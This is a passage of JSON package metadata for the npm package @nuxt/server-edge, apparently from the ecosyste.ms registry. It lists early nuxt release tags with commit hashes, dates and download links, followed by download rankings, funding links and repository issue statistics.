sts"},{"name":"v0.7.9","sha":"8801327db20c2e5daa594a7d8ad95d7a2a582a14","kind":"commit","published_at":"2016-12-04T18:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9/manifests"},{"name":"v0.7.8","sha":"ddbffcc8af4393e14cc44daa94b4a27a21c6fadf","kind":"commit","published_at":"2016-12-01T18:09:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8/manifests"},{"name":"v0.7.7","sha":"fdc430b23bac4a0cf86b0bc0da7828a573a0176d","kind":"commit","published_at":"2016-11-28T16:28:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7/manifests"},{"name":"v0.7.6","sha":"53499f2a6b0ebf7514f984f6d81ce76ab9aaeb09","kind":"commit","published_at":"2016-11-27T17:46:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6/manifests"},{"name":"v0.7.5","sha":"3ed1340d568c36f65bfe66618f9ac8119e8408de","kind":"commit","published_at":"2016-11-27T17:13:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5/manifests"},{"name":"v0.7.4","sha":"bcf291b54761b64c271573e045e9275f189c3bea","kind":"commit","published_at":"2016-11-25T16:58:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4/manifests"},{"name":"v0.7.3","sha":"cb1994319cd920b77181d852daf79a9c2c51b25c","kind":"commit","published_at":"2016-11-25T14:37:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3/manifests"},{"name":"v0.7.2","sha":"4b9fb87c860f69d4b5044533aee0c16310b10aa1","kind":"commit","published_at":"2016-11-24T13:41:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"d984c8803d9dd1e58c56a08b97f7d38ba5cb92b7","kind":"commit","published_at":"2016-11-24T12:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"40515ac91a9e4ae5fd7b4a37c75de2843f6d3fbc","kind":"commit","published_at":"2016-11-24T00:47:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0/manifests"},{"name":"v0.6.9","sha":"5b35834f42aa6cea3724f098787587a86ec6f4c3","kind":"commit","published_at":"2016-11-23T13:05:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"fc598ea66e1249645ed3677d8725efc1c048ba2d","kind":"commit","published_at":"2016-11-22T23:27:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"2400fabceb3b76b756efc8ede2919a4ccb088345","kind":"commit","published_at":"2016-11-21T18:53:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5/manifests"},{"name":"v0.6.0","sha":"edd0227e746c2ecde781915bd8c59e98f399439a","kind":"commit","published_at":"2016-11-21T13:15:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0/manifests"},{"name":"v0.5.2","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2/manifests"},{"name":"v0.5.3","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3/manifests"},{"name":"v0.5.1","sha":"8cbbaeaf838e33bb6e23f06e15724b39042c5206","kind":"commit","published_at":"2016-11-20T10:37:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"e48f8250a084202fbc492df55f13e3803e2b74cf","kind":"commit","published_at":"2016-11-18T13:45:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0/manifests"},{"name":"v0.4.9","sha":"d4b8bc4f022459c976b41cb9845be38759a0481a","kind":"commit","published_at":"2016-11-18T09:38:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9/manifests"},{"name":"v0.4.8","sha":"d928c9e5970e9d08eec61fe6770325d8c74e6d5b","kind":"commit","published_at":"2016-11-18T08:19:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"49f67566c2d74a661421be1589279b316dcc9e49","kind":"commit","published_at":"2016-11-17T21:12:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"06edc8029b796b8008fe52a682159636d10f3e7a","kind":"commit","published_at":"2016-11-17T13:02:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6/manifests"},{"name":"v0.4.4","sha":"2677afb46fc4a950d62f32e6172aeaa2fdcc5a8b","kind":"commit","published_at":"2016-11-17T10:57:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"a98e6d4e9bda0491bf8f32815701f42f28c793a2","kind":"commit","published_at":"2016-11-16T17:41:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"d2c0f01593e669147396ff25c4a017372a8390ea","kind":"commit","published_at":"2016-11-16T17:06:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"b1546682ef7ce3f9ead26f328417d2589875ef46","kind":"commit","published_at":"2016-11-16T16:55:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"c5c9448a264327adab3920d07937f819f5c0a3c4","kind":"commit","published_at":"2016-11-11T14:30:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0/manifests"},{"name":"v0.3.8","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"5b0ff5617b97d050983358879b6a70835d63be8a","kind":"commit","published_at":"2016-11-10T23:01:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"cb7406cba6a42a4009660569c921f7fdca5bb209","kind":"commit","published_at":"2016-11-10T18:34:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"ea1c5dee15ed92add7e8f69bd523cb090161194e","kind":"commit","published_at":"2016-11-10T16:16:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"9f370cb97c98ff40d4ed5c871147f3c441883b7f","kind":"commit","published_at":"2016-11-10T14:09:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"a8776de913a391bfd825b56cbd5ae655d3490240","kind":"commit","published_at":"2016-11-10T13:46:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"c97c4ec32e0b5a889bd3b95f5f18d251db202354","kind":"commit","published_at":"2016-11-10T02:38:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"d88948bdeac9cd3b8c8f1c1456198e666e49664e","kind":"commit","published_at":"2016-11-10T01:19:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0/manifests"},{"name":"v0.2.6","sha":"18a2b57655a6be21a93949520a663825471fbd48","kind":"commit","published_at":"2016-11-09T22:59:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"a5780a09cae0a0109103bf660da96e479ec5ef73","kind":"commit","published_at":"2016-11-09T14:55:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"73bdfc03943799025def2b91f2402208126da453","kind":"commit","published_at":"2016-11-09T01:35:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"90a97d76ce938be645f82f538a268a83b4c9630d","kind":"commit","published_at":"2016-11-08T02:48:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"923b211a929392e7bb77e3e9326655229397ca13","kind":"commit","published_at":"2016-11-08T00:54:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"876054ed48764ef11278c27d1884d94c3153b05d","kind":"commit","published_at":"2016-11-08T00:18:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"9ebbb14eabd73ed64871d0ee59fafaad914e95f2","kind":"commit","published_at":"2016-11-07T22:26:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0/manifests"}]},"repo_metadata_updated_at":"2024-10-29T22:52:08.508Z","dependent_packages_count":4,"downloads":26654,"downloads_period":"last-month","dependent_repos_count":424,"rankings":{"downloads":1.1059750560889152,"dependent_repos_count":0.8139738529674262,"dependent_packages_count":4.506936399663058,"stargazers_count":0.15564167441745766,"forks_count":0.5232519525968256,"docker_downloads_count":1.8105650152087687,"average":1.4860573251570752},"purl":"pkg:npm/%40nuxt/server-edge","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@nuxt/server-edge","docker_dependents_count":1,"docker_downloads_count":8,"usage_url":"https://repos.ecosyste.ms/usage/npm/@nuxt/server-edge","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@nuxt/server-edge/dependencies","status":null,"funding_links":["https://github.com/sponsors/nuxt","https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2024-10-29T15:44:34.308Z","issues_count":5866,"pull_requests_count":3404,"avg_time_to_close_issue":9336455.487222355,"avg_time_to_close_pull_request":862062.3253012048,"issues_closed_count":4166,"pull_requests_closed_count":3069,"pull_request_authors_count":452,"issue_authors_count":2655,"avg_comments_per_issue":5.084896010910331,"avg_comments_per_pull_request":2.099882491186839,"merged_pull_requests_count":2749,"bot_issues_count":1,"bot_pull_requests_count":1257,"past_year_issues_count":2725,"past_year_pull_requests_count":2325,"past_year_avg_time_to_close_issue":1465899.066102591,"past_year_avg_time_to_close_pull_request":278153.12717852095,"past_year_issues_closed_count":1881,"past_year_pull_requests_closed_count":2121,"past_year_pull_request_authors_count":310,"past_year_issue_authors_count":1437,"past_year_avg_comments_per_issue":3.424954128440367,"past_year_avg_comments_per_pull_request":2.0623655913978496,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":949,"past_year_merged_pull_requests_count":1933,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":819,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":227,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"pi0","count":127,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"manniL","count":93,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":77,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"antfu","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":41,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"Atinux","count":40,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"Hebilicious","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"BobbieGoede","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"dargmuesli","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"warflash","count":13,"url":"https://issues.ecosyste.ms/api/v1/host